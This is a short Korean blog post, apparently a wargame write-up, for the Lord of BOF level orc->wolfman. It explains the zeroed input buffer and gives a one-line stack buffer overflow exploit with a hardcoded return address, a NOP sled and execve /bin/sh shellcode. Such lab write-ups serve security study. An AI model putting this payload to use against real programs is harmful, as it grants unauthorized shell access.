튜기's blogggg

LOB orc->wolfman

by St1tch



코드를 보면 이전 문제와 거의 비슷한데 한가지 조건이 더 추가가 되었다.

입력 버퍼를 0으로 모두 초기화 시킨다.

따라서 ret주소를 입력버퍼로 하지 못하고, 쉘코드를 입력버퍼에 넣지 못한다.

이전 문제에서도 어처피 ret주소를 입력버퍼 주소로 하지 않았기 때문에 거의 동일한 exploit를 가지고 공격을 할 수 있다. 



입력버퍼의 크기도 딱 40이다.

따라서 이전과 같이 스택의 구조는 다음과 같다.





ret를 계산하기 위해 strcpy뒤에 브레이크를 걸어놓고 대충 인자를 넣어 스택주소를 확인을 했다.


exploit code

./wolfman `python -c 'print "\x90" * 44 + "\xa0\xfc\xff\xbf" + "\x90" * 300 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`



블로그의 정보

튜기's blogg(st1tch)

St1tch

활동하기